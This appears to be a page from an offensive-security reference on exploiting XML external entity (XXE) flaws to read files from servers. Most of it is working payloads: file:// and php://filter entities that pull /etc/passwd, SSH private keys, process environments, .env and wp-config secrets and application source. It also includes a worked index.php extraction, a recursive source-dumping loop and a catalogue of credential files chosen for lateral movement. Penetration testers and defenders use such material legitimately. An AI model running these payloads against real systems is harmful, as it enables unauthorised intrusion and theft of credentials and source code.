File Disclosure
Once you’ve confirmed external entity resolution works (see Identifying), file disclosure is template-substitution. Two paths depending on what the file contains:
# Path 1 - file:// for plain-text files<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>
# Path 2 - php://filter/ for files that contain XML-breaking characters# (source code with <, >, &) or binary content<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">]><root><name>&xxe;</name></root># → response contains base64; decode with `echo '...' | base64 -d`
# Path 3 - Java directory listing<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/">]><root><name>&xxe;</name></root># → directory contents (Java parsers only)Success indicator: response body contains the file’s contents (or its base64 encoding) where the entity was referenced.
Why two paths
Section titled “Why two paths”XML has reserved characters: <, >, &, ", '. When an entity is expanded into XML content, those characters break the parse. The parser either:
- Errors out (no useful output)
- Silently truncates at the first reserved character
- Successfully renders the file because the file contains no reserved characters
/etc/passwd, /etc/hostname, log files, plain-text configs - these typically work with raw file:// because they’re pure ASCII without </>/&. Source code, HTML, XML, config files with embedded shell, and any binary content - these break unless wrapped.
The wrapper of choice for PHP targets is php://filter/convert.base64-encode/ because base64 output is XML-safe by definition (alphanumeric + +, /, = - none are reserved). For non-PHP targets, the CDATA approach in Blind exfil is the alternative.
Path 1 - plain-text file read
Section titled “Path 1 - plain-text file read”The textbook payload:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><root> <name>&xxe;</name></root>Response contains the file:
<message>Thanks root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologin...</message>Adapting to the target
Section titled “Adapting to the target”The URL scheme is file:/// with three slashes - file:// is the scheme separator, then a third / for the absolute path root. Some parsers tolerate file:/etc/passwd (one slash) but the three-slash form is portable.
On Windows targets:
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"><!ENTITY xxe SYSTEM "file:///c:/boot.ini"><!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">Forward slashes work on Windows in file:// URIs. Backslashes work in some parsers but break in others; default to forward slashes.
Output is truncated at <, >, or &
Section titled “Output is truncated at <, >, or &”If /etc/hostname returns fully but /etc/passwd returns only the first line, the parser is choking on something in the file. Two diagnostics:
# Check what the file actually contains at the suspected break point$ curl http://target/.../?file_disclosure | head -c 200# If it stops at a < or & character, that's the breakIf the file has reserved characters, switch to Path 2.
Path 2 - php://filter wrapper for PHP targets
Section titled “Path 2 - php://filter wrapper for PHP targets”For PHP-backed apps, the php://filter/ wrapper lets the entity resolver apply a transformation before returning the content:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">]><root> <name>&xxe;</name></root>Response contains base64:
PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4uDecode:
$ echo 'PD9waHAKaW5jbHVkZSBfX0RJUl9fIC4gJy9jb25maWcucGhwJzsKLi4u' | base64 -d<?phpinclude __DIR__ . '/config.php';...Wrapper anatomy
Section titled “Wrapper anatomy”php://filter/<filter-chain>/resource=<file-path>Filter chain is convert.base64-encode for source-code extraction. Other useful filters:
| Filter | Effect | Use case |
|---|---|---|
convert.base64-encode | Base64 the output | Anything with <, >, &, or binary content |
convert.iconv.UTF-8.UTF-16 | Re-encode UTF-8 to UTF-16 | Sometimes survives where base64 doesn’t (rare) |
zlib.deflate | convert.base64-encode | Compress then base64 | Large files (chain with ` |
string.rot13 | ROT-13 | Curiosity; not generally useful |
Always start with convert.base64-encode - it’s the universal solution.
Path conventions
Section titled “Path conventions”The resource= value is the path the PHP wrapper opens. Try in order:
| Path | Used by |
|---|---|
Relative: resource=index.php | When the working directory is the webroot - most common |
Absolute Linux: resource=/var/www/html/index.php | When relative paths fail or you’ve identified the webroot from prior recon |
Absolute Windows: resource=c:/inetpub/wwwroot/index.php | Windows targets |
Some parsers refuse relative paths in the wrapper - start with absolute when you know the webroot, fall back to relative when you don’t.
Finding the webroot
Section titled “Finding the webroot”If absolute paths require knowing the webroot:
<!-- Often the simplest disclosure --><!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf">
<!-- Or nginx --><!ENTITY xxe SYSTEM "file:///etc/nginx/sites-enabled/default">
<!-- Or via /proc/self --><!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php">/proc/self/cwd/ is a symlink to the process’s working directory; reading cwd/index.php reads the index.php of whatever the PHP-FPM worker has cwd’d to. Bypasses the “I don’t know where the webroot is” problem entirely on Linux.
Path 3 - Java directory listing
Section titled “Path 3 - Java directory listing”Java’s XML parsers historically allowed pointing entities at directories, returning a directory listing rather than a file’s contents:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/">]><root><name>&xxe;</name></root>Response:
adduser.confalternatives/apache2/apt/bash.bashrc...Useful when you don’t know what files exist on the system. Listing /, /etc/, /home/, and /var/www/ quickly maps interesting targets.
This only works on Java parsers (and some older non-PHP parsers). PHP returns an error or empty when handed a directory. If you’re on a PHP target, see Identifying for how to detect framework.
High-value file targets
Section titled “High-value file targets”The catalog, organized by what you’re trying to accomplish:
Linux system reconnaissance
Section titled “Linux system reconnaissance”| File | Contents |
|---|---|
/etc/passwd | Users (UIDs, home dirs, shells) |
/etc/shadow | Password hashes (root-only; usually inaccessible) |
/etc/hostname | Server hostname |
/etc/hosts | Local DNS overrides |
/etc/resolv.conf | DNS server config |
/etc/os-release | Linux distribution |
/etc/issue | Login banner - often shows distro |
/proc/version | Kernel version |
/proc/self/environ | Process environment variables - sometimes leaks credentials |
/proc/self/cmdline | Process command line |
/proc/self/cwd/ | Symlink to current working directory |
/proc/self/fd/0, /proc/self/fd/1 | File descriptors (sometimes useful for log access) |
Web server config
Section titled “Web server config”| File | Contents |
|---|---|
/etc/apache2/apache2.conf | Apache main config |
/etc/apache2/sites-enabled/000-default.conf | Apache vhost config (reveals webroot) |
/etc/nginx/nginx.conf | Nginx main config |
/etc/nginx/sites-enabled/default | Nginx vhost config |
/etc/php/<version>/apache2/php.ini | PHP config (reveals enabled modules, including expect) |
/usr/local/etc/php/php.ini | Alternative PHP config path |
Application source code
Section titled “Application source code”| File | Likely path |
|---|---|
index.php | /var/www/html/index.php, /srv/www/index.php, /app/index.php |
config.php, db.php, .env | Database credentials, API keys |
wp-config.php (WordPress) | /var/www/html/wp-config.php - DB creds, secret keys |
application.properties (Spring) | /opt/app/application.properties - DB creds |
appsettings.json (.NET Core) | /var/www/app/appsettings.json |
settings.py (Django) | /srv/django/myapp/settings.py - SECRET_KEY, DB |
manage.py (Django) | Reveals project name |
Credentials and secrets
Section titled “Credentials and secrets”| File | Contents |
|---|---|
/home/<user>/.ssh/id_rsa | SSH private key - direct lateral movement |
/home/<user>/.ssh/authorized_keys | Confirms an account, lists trusted keys |
/root/.ssh/id_rsa | Root SSH key (usually root-only) |
/home/<user>/.bash_history | Command history - sometimes contains passwords typed inline |
/home/<user>/.aws/credentials | AWS access keys |
/home/<user>/.docker/config.json | Docker registry credentials |
/var/lib/mysql/mysql.sock | MySQL socket - confirms MySQL running |
Windows targets
Section titled “Windows targets”| File | Contents |
|---|---|
c:/windows/win.ini | Tiny baseline file; proves Windows + file read |
c:/windows/system.ini | System config |
c:/boot.ini | Boot config (legacy) |
c:/windows/system32/drivers/etc/hosts | Windows hosts file |
c:/inetpub/wwwroot/web.config | IIS app config - DB connection strings, machine keys |
c:/inetpub/logs/LogFiles/ | IIS logs (Java-style directory listing) |
c:/Users/<user>/.ssh/id_rsa | SSH key if installed |
c:/Windows/System32/config/SAM | Hashes (LSASS access required; usually blocked) |
Docker / container targets
Section titled “Docker / container targets”| File | Contents |
|---|---|
/.dockerenv | Presence proves you’re in a container |
/proc/self/cgroup | Container ID and cgroup info |
/etc/hostname | Container hostname (often randomized) |
/.docker/config.json | Container registry credentials |
Environment via /proc/self/environ | Often contains AWS creds, DB creds, app secrets |
Worked walkthrough - extracting index.php
Section titled “Worked walkthrough - extracting index.php”Suppose you have an XXE on a PHP contact form and want the app’s source.
Attempt 1 - direct file://
Section titled “Attempt 1 - direct file://”<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///var/www/html/index.php">]><root><name>&xxe;</name><email>x</email></root>Response:
ThanksEmpty. The <?php opening tag’s < character broke parsing. Switch to wrapper.
Attempt 2 - php://filter
Section titled “Attempt 2 - php://filter”<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">]><root><name>&xxe;</name><email>x</email></root>Response:
Thanks PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=Decode:
$ echo 'PD9waHAKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9TRVNTSU9OWyd1aWQnXSkpIHsKICAgIGhlYWRlcignTG9jYXRpb246IC9wcm9maWxlLnBocCcpOwogICAgZXhpdDsKfQouLi4=' | base64 -d<?phpsession_start();if (isset($_SESSION['uid'])) { header('Location: /profile.php'); exit;}...The source code is now in hand. Repeat for every PHP file referenced by index.php (include / require statements give you the paths to enumerate next).
Recursive source extraction
Section titled “Recursive source extraction”Once you have one file, look for include, require, include_once, require_once statements. Each names another file:
include 'config.php';require_once __DIR__ . '/db.php';include('/var/www/html/lib/auth.php');Loop: for each include/require, run the same XXE against the named file. After 3-5 iterations you’ve usually got the entire source tree.
For automation, see Automation - XXEinjector can mass-extract.
Edge cases
Section titled “Edge cases”File too large
Section titled “File too large”Some parsers truncate entity content after a fixed size (libxml has a 10MB default). Large log files or binaries may come back partial. Workarounds:
- Use a path filter that targets a specific section:
php://filter/read=string.toupper/resource=...doesn’t help with size; you’d have to read by offset - Use multiple entities chained for offset reading - complex; usually easier to find a smaller file
Permission errors
Section titled “Permission errors”Reading /etc/shadow typically fails because the PHP-FPM user isn’t root. The error response varies:
- Empty content (parser silently failed)
- HTTP 500 with stack trace
- Original response with empty entity expansion
/etc/shadow is essentially never readable via XXE on a well-configured system. Move on to /home/<user>/.ssh/id_rsa for the same kind of payoff.
Path with special characters
Section titled “Path with special characters”<!ENTITY xxe SYSTEM "file:///path/with spaces/file.txt">Spaces in paths sometimes need URL-encoding:
<!ENTITY xxe SYSTEM "file:///path/with%20spaces/file.txt">Either may work depending on parser. Try unencoded first; URL-encode if it fails.
Encoding mismatch
Section titled “Encoding mismatch”The response is gibberish even though the file should be plain text. Possibilities:
- File is UTF-16 or another encoding; specify in the XML declaration
<?xml version="1.0" encoding="UTF-16"?>- rarely needed for Linux text files - Parser is wrapping the output in unexpected encoding; try
convert.base64-encodeand decode manually
Quick reference
Section titled “Quick reference”| Task | Payload |
|---|---|
| Plain text file | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| PHP source code | <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> |
| Windows file | <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> |
| Java directory listing | <!ENTITY xxe SYSTEM "file:///etc/"> |
| Find current webroot | <!ENTITY xxe SYSTEM "file:///proc/self/cwd/index.php"> (Linux only) |
| Read SSH key | <!ENTITY xxe SYSTEM "file:///home/USERNAME/.ssh/id_rsa"> |
| Read process environment | <!ENTITY xxe SYSTEM "file:///proc/self/environ"> |
| Read Apache vhost | <!ENTITY xxe SYSTEM "file:///etc/apache2/sites-enabled/000-default.conf"> |
| Read .env (Laravel, generic) | <!ENTITY xxe SYSTEM "file:///var/www/html/.env"> |
| Decode base64 response | echo 'BASE64' | base64 -d |
If content truncates at < | Switch to php://filter/convert.base64-encode/ |
| If non-PHP target | See Blind exfil for CDATA wrap |
| If no reflection | See Blind exfil for OOB exfil |
| Recursive source extraction | Find include/require in extracted source; loop on named files |
For attacks beyond file read (SSRF, RCE via expect, DoS), see RCE and SSRF. For the blind variants when no response reflection is available, see Blind exfil.